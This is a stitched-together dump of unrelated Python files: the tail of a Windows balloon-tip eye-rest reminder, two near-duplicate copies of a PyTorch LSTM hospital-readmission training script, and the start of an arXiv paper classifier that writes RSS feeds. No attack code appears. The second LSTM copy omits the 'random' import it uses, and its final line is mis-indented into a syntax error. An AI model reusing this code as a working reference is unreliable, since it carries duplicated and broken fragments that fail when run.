            win32con.WM_DESTROY: self.OnDestroy,
        }
        # Register the Window class.
        # NOTE(review): RegisterClass raises if "PythonTaskbar" is already
        # registered, so constructing this class twice in one process will
        # fail - confirm single-shot usage is intended.
        wc = WNDCLASS()
        hinst = wc.hInstance = GetModuleHandle(None)
        wc.lpszClassName = "PythonTaskbar"
        # Could also specify a wndproc.
        wc.lpfnWndProc = message_map
        class_atom = RegisterClass(wc)
        # Create the Window.
        style = win32con.WS_OVERLAPPED | win32con.WS_SYSMENU
        self.hwnd = CreateWindow(
            class_atom,
            "Taskbar",
            style,
            0, 0,
            win32con.CW_USEDEFAULT,
            win32con.CW_USEDEFAULT,
            0, 0,
            hinst,
            None
        )
        UpdateWindow(self.hwnd)
        # Load the custom icon sitting next to the script; fall back to the
        # stock application icon if it cannot be loaded.
        icon_path_name = os.path.abspath(os.path.join( sys.path[0], "Googleeyes.ico" ))
        icon_flags = win32con.LR_LOADFROMFILE | win32con.LR_DEFAULTSIZE
        try:
            hicon = LoadImage( hinst, icon_path_name, win32con.IMAGE_ICON, 0, 0, icon_flags )
        except Exception as e:
            hicon = LoadIcon( 0, win32con.IDI_APPLICATION )
        # Add the tray icon first, then switch it to balloon (NIF_INFO) mode
        # with the caller's title and message.
        flags = NIF_ICON | NIF_MESSAGE | NIF_TIP
        nid = (self.hwnd, 0, flags, win32con.WM_USER+20, hicon, "tooltip")
        Shell_NotifyIcon(NIM_ADD, nid)
        Shell_NotifyIcon(NIM_MODIFY, (
            self.hwnd,
            0,
            NIF_INFO,
            win32con.WM_USER + 20,
            hicon,
            "Balloon tooltip",
            msg,
            200,  # timeout hint (ms); modern Windows largely ignores it
            title,
            NIIF_NOSOUND
        )
        )
        # self.show_balloon(title, msg)
        # Keep the window alive long enough for the balloon to be seen.
        time.sleep(5)
        DestroyWindow(self.hwnd)

    def OnDestroy(self, hwnd, msg, wparam, lparam):
        # Remove the tray icon before the window goes away.
        nid = (self.hwnd, 0)
        Shell_NotifyIcon(NIM_DELETE, nid)
        # Terminate the app.
        PostQuitMessage(0)
def balloon_tip(title, msg):
    # Convenience wrapper: constructing WindowsBalloonTip shows the balloon,
    # blocks ~5 seconds, then tears the window down.
    WindowsBalloonTip(title, msg)
if __name__ == '__main__':
    # Fix: dataset-dump residue fused onto the final line made it a syntax
    # error; the residue is removed. Behaviour is otherwise unchanged: pick
    # one nagging reminder at random and show it as a balloon tip.
    messages = [
        "The time has come when I will have to ask you to move your eyes as constantly staring at your screen would harm them!",
        "It's been 15 minutes!! How could you still be looking at your screen!!",
        "See, Let me shout you this again. MOVE YOUR EYES! STOP STARING AT YOUR SCREEN.",
        "This is the time when you should give your eyes some rest."
    ]
    balloon_tip("Hey! You studious nerd!", messages[randint(0, len(messages) - 1)])
import random
import pandas as pd
import numpy as np
from tqdm import tqdm
import datetime as dt
from itertools import combinations
import matplotlib.pyplot as plt
import collections
from sklearn.model_selection import StratifiedShuffleSplit, StratifiedKFold
from sklearn.metrics import average_precision_score, f1_score, roc_auc_score
from gensim.models import Word2Vec
from src.utils import PickleUtils
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.utils.data import BatchSampler, RandomSampler, SequentialSampler
dev = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
class VanillaLSTM(nn.Module):
    """LSTM classifier over tokenized patient journeys.

    The padded token sequence is embedded, run through a (possibly stacked)
    LSTM, max-pooled over time, and reduced to a single logit by a small
    fully connected head.
    """

    def __init__(self, vocab, lstm_layers, lstm_units, embed_dim, drop_rate):
        super(VanillaLSTM, self).__init__()
        # Keep the configuration around for introspection.
        self.vocab = vocab
        self.lstm_layers = lstm_layers
        self.lstm_units = lstm_units
        self.embed_dim = embed_dim
        self.drop_rate = drop_rate
        # Token embedding; the '<PAD>' row is pinned to the zero vector.
        self.embedding = nn.Embedding(
            num_embeddings=len(vocab),
            embedding_dim=embed_dim,
            padding_idx=vocab['<PAD>'],
        )
        # Sequence encoder.
        self.lstm = nn.LSTM(
            input_size=embed_dim,
            hidden_size=lstm_units,
            num_layers=lstm_layers,
            batch_first=True,
            dropout=drop_rate,
        )
        # Classification head: one hidden layer, then a single logit.
        half_units = lstm_units // 2
        self.fc = nn.Sequential(
            nn.Linear(lstm_units, half_units),
            nn.ReLU(),
            nn.Dropout(p=drop_rate),
            nn.Linear(half_units, 1),
        )

    def forward(self, jny, hid_init):
        """Return one logit per journey.

        jny: (batch, seq_len) LongTensor of token ids.
        hid_init: (h_0, c_0) initial LSTM state.
        """
        embedded = self.embedding(jny)
        # outputs has shape (batch, seq_len, lstm_units).
        outputs, _ = self.lstm(embedded, hid_init)
        # Max-pool over the time dimension.
        pooled = outputs.max(dim=1).values
        return self.fc(pooled)
def parse_args():
    """Parse command-line options for training and evaluation.

    Fixes two latent crashes: ``argparse`` was never imported at module
    level (NameError on first call), and ``main``/``train``/``test`` read
    ``args.weight_decay`` and ``args.dev``, which were never defined
    (AttributeError). Both attributes are now provided.
    """
    import argparse  # local import: argparse is not imported at module level

    parser = argparse.ArgumentParser()
    parser.add_argument('--seed', type=int, default=1986,
                        help='global random seed number')
    parser.add_argument('--epochs', type=int, default=20,
                        help='number of epochs of training')
    parser.add_argument('--lr', type=float, default=1e-4,
                        help='learning rate')
    parser.add_argument('--drop-rate', type=float, default=0.5,
                        help='dropout rate')
    parser.add_argument('--weight-decay', type=float, default=0.0,
                        help='L2 penalty passed to the Adam optimizer')
    parser.add_argument('--clip', type=float, default=0.25)
    parser.add_argument('--embed-dim', type=int, default=128)
    parser.add_argument('--lstm-layers', type=int, default=2)
    parser.add_argument('--lstm-units', type=int, default=256)
    parser.add_argument('--batch-size', type=int, default=64)
    parser.add_argument('--log-interval', type=int, default=100)
    parser.add_argument('--embedding', type=int, default=0, help='0: me2vec; 1: metapath2vec; 2: node2vec; 3: word2vec; 4: random initialization.')
    parser.add_argument('--checkpoint', dest='checkpoint', action='store_true')
    parser.set_defaults(weighted=True)
    args = parser.parse_args()
    # train()/test() place tensors on args.dev; expose the compute device
    # here so callers do not have to patch the namespace by hand.
    args.dev = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
    return args
def set_rnd_seed(seed):
    """Seed every RNG the script touches so runs are reproducible."""
    # torch.cuda.manual_seed is a safe no-op on CPU-only machines.
    for seed_fn in (random.seed, np.random.seed,
                    torch.manual_seed, torch.cuda.manual_seed):
        seed_fn(seed)
def load_emb(ppd_path):
    """Load a word2vec-format embedding file and sort rows by integer id.

    Returns (sorted_ids, embeddings), where embeddings[i] is the vector
    belonging to sorted_ids[i]. The first (header) line is skipped.
    """
    raw = np.loadtxt(ppd_path, skiprows=1)
    ids = np.array([int(row[0]) for row in raw])
    vectors = np.array([row[1:] for row in raw])
    order = np.argsort(ids)
    return ids[order], vectors[order, :]
def train(epoch, model, optimizer, args, padded_jny, pat_lbls):
    '''
    Run one epoch of optimization and return the mean training loss.

    padded_jny: padded and tokenized patient journeys
    pat_lbls: binary outcome of each patient
    '''
    # set the model in train mode
    model.train()
    train_loss = 0
    # Shuffled mini-batch index lists for this epoch.
    idx_list = list(BatchSampler(RandomSampler(range(len(padded_jny))), args.batch_size, drop_last=False))
    # Move the whole dataset to the target device once, up front.
    padded_jny_ts = torch.tensor(padded_jny, device=args.dev, dtype=torch.long)
    pat_lbls_ts = torch.tensor(pat_lbls, device=args.dev, dtype=torch.float)
    for i in range(len(idx_list)):
        # load current batch into tensor
        cur_batch_jnys = padded_jny_ts[idx_list[i]]
        cur_batch_lbls = pat_lbls_ts[idx_list[i]]
        # train model
        # NOTE(review): the LSTM state starts from random noise each batch
        # (zeros are more conventional) - presumably intentional; confirm.
        h_0 = torch.randn(args.lstm_layers, len(cur_batch_jnys), args.lstm_units, device=args.dev)
        c_0 = torch.randn(args.lstm_layers, len(cur_batch_jnys), args.lstm_units, device=args.dev)
        optimizer.zero_grad()
        y_pred = model(cur_batch_jnys, (h_0, c_0)).squeeze()
        loss = F.binary_cross_entropy_with_logits(y_pred, cur_batch_lbls)
        # Accumulate the per-sample sum; normalized after the loop.
        train_loss += loss.item() * len(cur_batch_jnys)
        loss.backward()
        # Clip gradient norm to stabilize LSTM training.
        torch.nn.utils.clip_grad_norm_(model.parameters(), args.clip)
        optimizer.step()
        # display running loss
        if i % args.log_interval == 0:
            print('Train Epoch: {} [{}/{} ({:.0f}%)]\tLoss: {:.4f}'.format(
                epoch, (i + 1) * args.batch_size, len(padded_jny),
                100. * (i + 1) * args.batch_size / len(padded_jny), loss.item()))
    train_loss /= len(padded_jny)
    print('Average train loss of epoch {} is {:.4f}.'.format(epoch, train_loss))
    return train_loss
def test(epoch, model, args, padded_jny, pat_lbls):
    """Evaluate the model; return (sigmoid predictions, mean loss)."""
    # set the mode in testing mode
    model.eval()
    test_loss = 0
    # Sequential batches so predictions line up with input order.
    idx_list = list(BatchSampler(SequentialSampler(range(len(padded_jny))), args.batch_size, drop_last=False))
    padded_jny_ts = torch.tensor(padded_jny, device=args.dev, dtype=torch.long)
    pat_lbls_ts = torch.tensor(pat_lbls, device=args.dev, dtype=torch.float)
    # Dummy leading element; stripped off before returning.
    y_pred_total = torch.zeros(1,)
    with torch.no_grad():
        for i in range(len(idx_list)):
            # load current batch into tensor
            cur_batch_jnys = padded_jny_ts[idx_list[i]]
            cur_batch_lbls = pat_lbls_ts[idx_list[i]]
            # test model
            # NOTE(review): random initial LSTM states make evaluation
            # slightly non-deterministic - confirm this is intended.
            h_0 = torch.randn(args.lstm_layers, len(cur_batch_jnys), args.lstm_units, device=args.dev)
            c_0 = torch.randn(args.lstm_layers, len(cur_batch_jnys), args.lstm_units, device=args.dev)
            # NOTE(review): .squeeze() yields a 0-d tensor when the last
            # batch holds a single sample; torch.cat would then fail -
            # verify the dataset size never produces a 1-sample batch.
            y_pred = model(cur_batch_jnys, (h_0, c_0)).squeeze()
            y_pred_total = torch.cat((y_pred_total, torch.sigmoid(y_pred).detach().cpu()))
            loss = F.binary_cross_entropy_with_logits(y_pred, cur_batch_lbls)
            test_loss += loss.item() * len(cur_batch_jnys)
    test_loss /= len(padded_jny)
    print('Average test loss of epoch {} is {:.4f}.'.format(epoch, test_loss))
    return y_pred_total[1:].numpy(), test_loss
def save_best_model(model, PATH):
    """Persist the model weights to PATH under the 'model_state_dict' key."""
    checkpoint = {'model_state_dict': model.state_dict()}
    torch.save(checkpoint, PATH)
def main(args):
    """Run 10-fold readmission prediction and report PR-AUC / ROC-AUC.

    Fix: the pretrained-embedding tensor was built unconditionally, so
    ``--embedding 3`` (word2vec, built per fold) and ``--embedding 4``
    (random init) crashed with NameError because ``svc_emb`` was never
    loaded; that block is now guarded.
    """
    # Tokenized, padded patient journeys and their readmission labels.
    med_seq = pd.read_parquet('saved_data/pat_seq_readmission_v2.parquet')
    data_jny_np = np.stack(med_seq.seq.values, axis=0)
    labels = med_seq.readmission.values
    # Service-token vocabulary; id 3157 is reserved for the padding token.
    svc_dict = pd.read_csv('saved_data/svc_dict.csv')
    svc_dict = dict(zip(svc_dict['PPD name'], svc_dict['svc_id']))
    svc_dict['<PAD>'] = 3157
    # Pretrained service embeddings for options 0-2; word2vec (3) is trained
    # per fold below and random init (4) keeps the model's own embedding.
    svc_emb = None
    if args.embedding == 0:
        svc_emb = PickleUtils.loader('saved_data/svc_emb.pkl')
    elif args.embedding == 1:
        svc_emb = PickleUtils.loader('saved_data/baseline/pat_metapath_emb.pkl')
        svc_emb = svc_emb[141666:(141666 + 3157)]
    elif args.embedding == 2:
        svc_emb = PickleUtils.loader('saved_data/baseline/pat_node2vec_emb.pkl')
        svc_emb = svc_emb[141666:(141666 + 3157)]
    if svc_emb is not None:
        # Build the embedding matrix: one extra zero row for <PAD>.
        svc_id = np.asarray(list(range(3157)))
        svc_emb_ts = torch.randn(len(svc_id) + 1, args.embed_dim, dtype=torch.float)
        svc_emb_ts[-1] = torch.zeros(args.embed_dim, dtype=torch.float)
        svc_emb_ts[svc_id] = torch.FloatTensor(svc_emb)
    # Row 0: PR-AUC, row 1: ROC-AUC; one column per fold.
    pr_logs = np.zeros((2, 10))
    skf = StratifiedShuffleSplit(train_size=0.8, random_state=0, n_splits=10)
    for fold_idx, (train_idx, test_idx) in enumerate(skf.split(data_jny_np, labels)):
        print('=' * 70)
        print('Fold={}'.format(fold_idx))
        # 80/10/10 train/val/test split (the held-out 20% is halved).
        train_jny_np = data_jny_np[train_idx]
        train_labels = labels[train_idx]
        test_jny_np = data_jny_np[test_idx]
        test_labels = labels[test_idx]
        ss = StratifiedShuffleSplit(train_size=0.5)
        ii = next(ss.split(test_jny_np, test_labels))
        val_jny_np = test_jny_np[ii[0]]
        val_labels = test_labels[ii[0]]
        test_jny_np = test_jny_np[ii[1]]
        test_labels = test_labels[ii[1]]
        train_jny_list = train_jny_np.tolist()
        # Fresh, identically-seeded model per fold for comparability.
        set_rnd_seed(1986)
        model = VanillaLSTM(
            vocab=svc_dict,
            lstm_layers=args.lstm_layers,
            lstm_units=args.lstm_units,
            embed_dim=args.embed_dim,
            drop_rate=args.drop_rate
        )
        if args.embedding == 3:
            # Train a word2vec embedding on this fold's training journeys.
            walks = [list(map(str, walk)) for walk in train_jny_list]
            wv_model = Word2Vec(walks, size=args.embed_dim, window=20, min_count=0, sg=1,
                                workers=8, iter=150)
            wv_model.wv.save_word2vec_format('saved_data/baseline/wv2.emd')
            svc_id, svc_emb = load_emb('saved_data/baseline/wv2.emd')
            svc_emb_ts = torch.randn(len(svc_dict), args.embed_dim, dtype=torch.float)
            svc_emb_ts[-1] = torch.zeros(args.embed_dim, dtype=torch.float)
            svc_emb_ts[svc_id] = torch.FloatTensor(svc_emb)
        if args.embedding != 4:
            # Warm-start the embedding layer; keep it trainable.
            model.embedding = nn.Embedding.from_pretrained(svc_emb_ts, freeze=False)
        model = model.to(args.dev)
        opt = optim.Adam(model.parameters(), lr=args.lr, weight_decay=args.weight_decay)
        # Keep the checkpoint with the best validation PR-AUC.
        best_pr = 0
        for epoch in range(1, args.epochs + 1):
            train_loss = train(epoch, model, opt, args, train_jny_np, train_labels)
            y_pred, val_loss = test(epoch, model, args, val_jny_np, val_labels)
            pr_auc = average_precision_score(val_labels, y_pred, average='micro')
            if pr_auc > best_pr:
                best_pr = pr_auc
                save_best_model(model, 'saved_models/best_pretrain_sequential')
            print('PR AUC of epoch {} is {:.4f}.\n'.format(epoch, pr_auc))
        # Evaluate the best checkpoint on the held-out test split.
        checkpoint = torch.load('saved_models/best_pretrain_sequential')
        model.load_state_dict(checkpoint['model_state_dict'])
        y_pred, _ = test(1, model, args, test_jny_np, test_labels)
        pr_logs[0, fold_idx] = average_precision_score(test_labels, y_pred, average='micro')
        pr_logs[1, fold_idx] = roc_auc_score(test_labels, y_pred, average='micro')
    print(pr_logs)
if __name__ == "__main__":
    # Fix: dataset-dump residue fused onto the final line made it a syntax
    # error; the residue is removed. Behaviour is unchanged.
    args = parse_args()
    main(args)
import pandas as pd
import numpy as np
from tqdm import tqdm
import datetime as dt
from itertools import combinations
import matplotlib.pyplot as plt
import collections
from sklearn.model_selection import StratifiedShuffleSplit, StratifiedKFold
from sklearn.metrics import average_precision_score, f1_score, roc_auc_score
from gensim.models import Word2Vec
from src.utils import PickleUtils
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.utils.data import BatchSampler, RandomSampler, SequentialSampler
dev = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
class VanillaLSTM(nn.Module):
    """LSTM classifier over tokenized patient journeys.

    The padded token sequence is embedded, run through a (possibly stacked)
    LSTM, max-pooled over time, and reduced to a single logit by a small
    fully connected head.
    """

    def __init__(self, vocab, lstm_layers, lstm_units, embed_dim, drop_rate):
        super(VanillaLSTM, self).__init__()
        # Keep the configuration around for introspection.
        self.vocab = vocab
        self.lstm_layers = lstm_layers
        self.lstm_units = lstm_units
        self.embed_dim = embed_dim
        self.drop_rate = drop_rate
        # Token embedding; the '<PAD>' row is pinned to the zero vector.
        self.embedding = nn.Embedding(
            num_embeddings=len(vocab),
            embedding_dim=embed_dim,
            padding_idx=vocab['<PAD>'],
        )
        # Sequence encoder.
        self.lstm = nn.LSTM(
            input_size=embed_dim,
            hidden_size=lstm_units,
            num_layers=lstm_layers,
            batch_first=True,
            dropout=drop_rate,
        )
        # Classification head: one hidden layer, then a single logit.
        half_units = lstm_units // 2
        self.fc = nn.Sequential(
            nn.Linear(lstm_units, half_units),
            nn.ReLU(),
            nn.Dropout(p=drop_rate),
            nn.Linear(half_units, 1),
        )

    def forward(self, jny, hid_init):
        """Return one logit per journey.

        jny: (batch, seq_len) LongTensor of token ids.
        hid_init: (h_0, c_0) initial LSTM state.
        """
        embedded = self.embedding(jny)
        # outputs has shape (batch, seq_len, lstm_units).
        outputs, _ = self.lstm(embedded, hid_init)
        # Max-pool over the time dimension.
        pooled = outputs.max(dim=1).values
        return self.fc(pooled)
def parse_args():
    """Parse command-line options for training and evaluation.

    Fixes two latent crashes: ``argparse`` was never imported at module
    level (NameError on first call), and ``main``/``train``/``test`` read
    ``args.weight_decay`` and ``args.dev``, which were never defined
    (AttributeError). Both attributes are now provided.
    """
    import argparse  # local import: argparse is not imported at module level

    parser = argparse.ArgumentParser()
    parser.add_argument('--seed', type=int, default=1986,
                        help='global random seed number')
    parser.add_argument('--epochs', type=int, default=20,
                        help='number of epochs of training')
    parser.add_argument('--lr', type=float, default=1e-4,
                        help='learning rate')
    parser.add_argument('--drop-rate', type=float, default=0.5,
                        help='dropout rate')
    parser.add_argument('--weight-decay', type=float, default=0.0,
                        help='L2 penalty passed to the Adam optimizer')
    parser.add_argument('--clip', type=float, default=0.25)
    parser.add_argument('--embed-dim', type=int, default=128)
    parser.add_argument('--lstm-layers', type=int, default=2)
    parser.add_argument('--lstm-units', type=int, default=256)
    parser.add_argument('--batch-size', type=int, default=64)
    parser.add_argument('--log-interval', type=int, default=100)
    parser.add_argument('--embedding', type=int, default=0, help='0: me2vec; 1: metapath2vec; 2: node2vec; 3: word2vec; 4: random initialization.')
    parser.add_argument('--checkpoint', dest='checkpoint', action='store_true')
    parser.set_defaults(weighted=True)
    args = parser.parse_args()
    # train()/test() place tensors on args.dev; expose the compute device
    # here so callers do not have to patch the namespace by hand.
    args.dev = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
    return args
def set_rnd_seed(seed):
    """Seed every RNG the script touches so runs are reproducible."""
    # torch.cuda.manual_seed is a safe no-op on CPU-only machines.
    for seed_fn in (random.seed, np.random.seed,
                    torch.manual_seed, torch.cuda.manual_seed):
        seed_fn(seed)
def load_emb(ppd_path):
    """Load a word2vec-format embedding file and sort rows by integer id.

    Returns (sorted_ids, embeddings), where embeddings[i] is the vector
    belonging to sorted_ids[i]. The first (header) line is skipped.
    """
    raw = np.loadtxt(ppd_path, skiprows=1)
    ids = np.array([int(row[0]) for row in raw])
    vectors = np.array([row[1:] for row in raw])
    order = np.argsort(ids)
    return ids[order], vectors[order, :]
def train(epoch, model, optimizer, args, padded_jny, pat_lbls):
    '''
    Run one epoch of optimization and return the mean training loss.

    padded_jny: padded and tokenized patient journeys
    pat_lbls: binary outcome of each patient
    '''
    # set the model in train mode
    model.train()
    train_loss = 0
    # Shuffled mini-batch index lists for this epoch.
    idx_list = list(BatchSampler(RandomSampler(range(len(padded_jny))), args.batch_size, drop_last=False))
    # Move the whole dataset to the target device once, up front.
    padded_jny_ts = torch.tensor(padded_jny, device=args.dev, dtype=torch.long)
    pat_lbls_ts = torch.tensor(pat_lbls, device=args.dev, dtype=torch.float)
    for i in range(len(idx_list)):
        # load current batch into tensor
        cur_batch_jnys = padded_jny_ts[idx_list[i]]
        cur_batch_lbls = pat_lbls_ts[idx_list[i]]
        # train model
        # NOTE(review): the LSTM state starts from random noise each batch
        # (zeros are more conventional) - presumably intentional; confirm.
        h_0 = torch.randn(args.lstm_layers, len(cur_batch_jnys), args.lstm_units, device=args.dev)
        c_0 = torch.randn(args.lstm_layers, len(cur_batch_jnys), args.lstm_units, device=args.dev)
        optimizer.zero_grad()
        y_pred = model(cur_batch_jnys, (h_0, c_0)).squeeze()
        loss = F.binary_cross_entropy_with_logits(y_pred, cur_batch_lbls)
        # Accumulate the per-sample sum; normalized after the loop.
        train_loss += loss.item() * len(cur_batch_jnys)
        loss.backward()
        # Clip gradient norm to stabilize LSTM training.
        torch.nn.utils.clip_grad_norm_(model.parameters(), args.clip)
        optimizer.step()
        # display running loss
        if i % args.log_interval == 0:
            print('Train Epoch: {} [{}/{} ({:.0f}%)]\tLoss: {:.4f}'.format(
                epoch, (i + 1) * args.batch_size, len(padded_jny),
                100. * (i + 1) * args.batch_size / len(padded_jny), loss.item()))
    train_loss /= len(padded_jny)
    print('Average train loss of epoch {} is {:.4f}.'.format(epoch, train_loss))
    return train_loss
def test(epoch, model, args, padded_jny, pat_lbls):
    """Evaluate the model; return (sigmoid predictions, mean loss)."""
    # set the mode in testing mode
    model.eval()
    test_loss = 0
    # Sequential batches so predictions line up with input order.
    idx_list = list(BatchSampler(SequentialSampler(range(len(padded_jny))), args.batch_size, drop_last=False))
    padded_jny_ts = torch.tensor(padded_jny, device=args.dev, dtype=torch.long)
    pat_lbls_ts = torch.tensor(pat_lbls, device=args.dev, dtype=torch.float)
    # Dummy leading element; stripped off before returning.
    y_pred_total = torch.zeros(1,)
    with torch.no_grad():
        for i in range(len(idx_list)):
            # load current batch into tensor
            cur_batch_jnys = padded_jny_ts[idx_list[i]]
            cur_batch_lbls = pat_lbls_ts[idx_list[i]]
            # test model
            # NOTE(review): random initial LSTM states make evaluation
            # slightly non-deterministic - confirm this is intended.
            h_0 = torch.randn(args.lstm_layers, len(cur_batch_jnys), args.lstm_units, device=args.dev)
            c_0 = torch.randn(args.lstm_layers, len(cur_batch_jnys), args.lstm_units, device=args.dev)
            # NOTE(review): .squeeze() yields a 0-d tensor when the last
            # batch holds a single sample; torch.cat would then fail -
            # verify the dataset size never produces a 1-sample batch.
            y_pred = model(cur_batch_jnys, (h_0, c_0)).squeeze()
            y_pred_total = torch.cat((y_pred_total, torch.sigmoid(y_pred).detach().cpu()))
            loss = F.binary_cross_entropy_with_logits(y_pred, cur_batch_lbls)
            test_loss += loss.item() * len(cur_batch_jnys)
    test_loss /= len(padded_jny)
    print('Average test loss of epoch {} is {:.4f}.'.format(epoch, test_loss))
    return y_pred_total[1:].numpy(), test_loss
def save_best_model(model, PATH):
    """Persist the model weights to PATH under the 'model_state_dict' key."""
    checkpoint = {'model_state_dict': model.state_dict()}
    torch.save(checkpoint, PATH)
def main(args):
    """Run a 10-fold train/validate/test loop for readmission prediction.

    ``args.embedding`` selects how the service-code embedding is initialised:
    0 = project embedding, 1 = metapath2vec, 2 = node2vec, 3 = word2vec
    trained per fold on the training journeys, 4 = random (trained from
    scratch). PR-AUC and ROC-AUC per fold are accumulated in ``pr_logs``.
    """
    med_seq = pd.read_parquet('saved_data/pat_seq_readmission_v2.parquet')
    data_jny_np = np.stack(med_seq.seq.values, axis=0)
    labels = med_seq.readmission.values
    # Service-code vocabulary; id 3157 is reserved for the padding token.
    svc_dict = pd.read_csv('saved_data/svc_dict.csv')
    svc_dict = dict(zip(svc_dict['PPD name'], svc_dict['svc_id']))
    svc_dict['<PAD>'] = 3157
    if args.embedding == 0:
        svc_emb = PickleUtils.loader('saved_data/svc_emb.pkl')
    elif args.embedding == 1:
        svc_emb = PickleUtils.loader('saved_data/baseline/pat_metapath_emb.pkl')
        # Service nodes occupy rows [141666, 141666 + 3157) of the graph embedding.
        svc_emb = svc_emb[141666:(141666 + 3157)]
    elif args.embedding == 2:
        svc_emb = PickleUtils.loader('saved_data/baseline/pat_node2vec_emb.pkl')
        svc_emb = svc_emb[141666:(141666 + 3157)]
    if args.embedding in (0, 1, 2):
        # Build the pretrained embedding matrix only when a table was loaded
        # above. Previously this ran unconditionally and raised NameError for
        # embedding modes 3 (word2vec, built per fold) and 4 (random).
        svc_id = np.asarray(list(range(3157)))
        svc_emb_ts = torch.randn(len(svc_id) + 1, args.embed_dim, dtype=torch.float)
        svc_emb_ts[-1] = torch.zeros(args.embed_dim, dtype=torch.float)  # <PAD> row stays zero
        svc_emb_ts[svc_id] = torch.FloatTensor(svc_emb)
    # Row 0: PR-AUC per fold; row 1: ROC-AUC per fold.
    pr_logs = np.zeros((2, 10))
    skf = StratifiedShuffleSplit(train_size=0.8, random_state=0, n_splits=10)
    for fold_idx, (train_idx, test_idx) in enumerate(skf.split(data_jny_np, labels)):
        print('=' * 70)
        print('Fold={}'.format(fold_idx))
        # Data split: 80% train; the remaining 20% is halved into val/test.
        train_jny_np = data_jny_np[train_idx]
        train_labels = labels[train_idx]
        test_jny_np = data_jny_np[test_idx]
        test_labels = labels[test_idx]
        ss = StratifiedShuffleSplit(train_size=0.5)
        ii = next(ss.split(test_jny_np, test_labels))
        val_jny_np = test_jny_np[ii[0]]
        val_labels = test_labels[ii[0]]
        test_jny_np = test_jny_np[ii[1]]
        test_labels = test_labels[ii[1]]
        train_jny_list = train_jny_np.tolist()
        # Train model (fixed seed so every fold starts from identical weights).
        set_rnd_seed(1986)
        model = VanillaLSTM(
            vocab=svc_dict,
            lstm_layers=args.lstm_layers,
            lstm_units=args.lstm_units,
            embed_dim=args.embed_dim,
            drop_rate=args.drop_rate
        )
        if args.embedding == 3:
            # Train a word2vec embedding on this fold's training journeys only.
            walks = [list(map(str, walk)) for walk in train_jny_list]
            wv_model = Word2Vec(walks, size=args.embed_dim, window=20, min_count=0, sg=1,
                                workers=8, iter=150)
            wv_model.wv.save_word2vec_format('saved_data/baseline/wv2.emd')
            svc_id, svc_emb = load_emb('saved_data/baseline/wv2.emd')
            svc_emb_ts = torch.randn(len(svc_dict), args.embed_dim, dtype=torch.float)
            svc_emb_ts[-1] = torch.zeros(args.embed_dim, dtype=torch.float)
            svc_emb_ts[svc_id] = torch.FloatTensor(svc_emb)
        if args.embedding != 4:
            # Mode 4 keeps the randomly-initialised embedding layer.
            model.embedding = nn.Embedding.from_pretrained(svc_emb_ts, freeze=False)
        model = model.to(args.dev)
        opt = optim.Adam(model.parameters(), lr=args.lr, weight_decay=args.weight_decay)
        best_pr = 0
        for epoch in range(1, args.epochs + 1):
            train_loss = train(epoch, model, opt, args, train_jny_np, train_labels)
            y_pred, val_loss = test(epoch, model, args, val_jny_np, val_labels)
            # Model selection on validation PR-AUC.
            pr_auc = average_precision_score(val_labels, y_pred, average='micro')
            if pr_auc > best_pr:
                best_pr = pr_auc
                save_best_model(model, 'saved_models/best_pretrain_sequential')
            print('PR AUC of epoch {} is {:.4f}.\n'.format(epoch, pr_auc))
        # Load the best checkpoint and evaluate on the held-out test set.
        checkpoint = torch.load('saved_models/best_pretrain_sequential')
        model.load_state_dict(checkpoint['model_state_dict'])
        y_pred, _ = test(1, model, args, test_jny_np, test_labels)
        pr_logs[0, fold_idx] = average_precision_score(test_labels, y_pred, average='micro')
        pr_logs[1, fold_idx] = roc_auc_score(test_labels, y_pred, average='micro')
    print(pr_logs)
if __name__ == "__main__":
args = parse_args()
    main(args)
import logging
import os
import subprocess
import xml.etree.ElementTree as ET
from datetime import datetime
from glob import glob
import feedgenerator
import requests
from scipy.special import softmax
logging.basicConfig()
log = logging.getLogger(__name__)
def main():
    """Harvest new arXiv records, classify them, and write two RSS feeds.

    feed/feed.xml collects every paper the model flags as cs.SE-like that
    arXiv did not already tag cs.SE/cs.PL; feed/feed2.xml is the subset
    originating from cs.AI / cs.LG / stat.ML.
    """
    harvest_since_last_modification()
    entries = list(iter_load_entries_from_xml())
    if not entries:
        log.error("No new entries, is it the weekend?")
        return
    # One classifier input per record: title + abstract collapsed to one line.
    texts = [
        single_line(entry["title"] + " abstract: " + entry["abstract"])
        for entry in entries
    ]
    model = load_model()
    # model.predict(texts) returns (labels, raw scores); zip the four streams.
    entries = (
        *model.predict(texts),
        texts,
        entries,
    )  # prediction label, score, arxiv text, arxiv label
    feed = feedgenerator.Rss201rev2Feed(
        title="arXiv misclassified: all",
        link="http://export.arxiv.org/rss/",
        description="Papers from arXiv that should be classifed cs.SE according to our model.",
        language="en",
    )
    sub_categories = ("cs.AI", "cs.LG", "stat.ML")
    sub_categories_str = " ".join(sub_categories)
    feed_sub = feedgenerator.Rss201rev2Feed(
        title="arXiv misclassified: " + sub_categories_str,
        link="http://export.arxiv.org/rss/",
        description="Papers from "
        + sub_categories_str
        + " that should be classifed cs.SE according to our model.",
        language="en",
    )
    for pred, score, text, entry in zip(*entries):
        label = entry["categories"]
        # Only report positives arXiv did not already file under SE/PL.
        if pred and "cs.se" not in label.lower() and "cs.pl" not in label.lower():
            abs_link = entry["link"]
            abstract = entry["abstract"]
            authors = entry["authors"]
            pdf_link = abs_link.replace("/abs/", "/pdf/")
            # Normalise the raw pair of logits; score[1] reads as P(positive).
            # NOTE(review): assumes a binary model output — confirm.
            score = softmax(score)
            title = entry["title"]
            # NOTE(review): no timeout on this request, so a hung connection
            # stalls the whole run; on success the item description becomes
            # the entire abs-page HTML — looks deliberate, but worth confirming.
            r = requests.get(abs_link)
            if r.ok:
                description = r.text
            else:
                description = f"""
            {abstract}
            <p>Authors: {authors}
            <p><a href="{pdf_link}">{pdf_link}</a>
            <p><a href="{abs_link}">{abs_link}</a>
            <p>Categories: {label}
            <p>score: {score[1]:.2f}
            """.strip()
            args = dict(
                title=title,
                link=pdf_link,
                description=description,
                unique_id=pdf_link,
                categories=label.split(),
            )
            feed.add_item(**args)
            if any(sub in label for sub in sub_categories):
                feed_sub.add_item(**args)
    os.makedirs("feed", exist_ok=True)
    with open("feed/feed.xml", "w") as f:
        print(feed.writeString("utf-8"), file=f)
    with open("feed/feed2.xml", "w") as f:
        print(feed_sub.writeString("utf-8"), file=f)
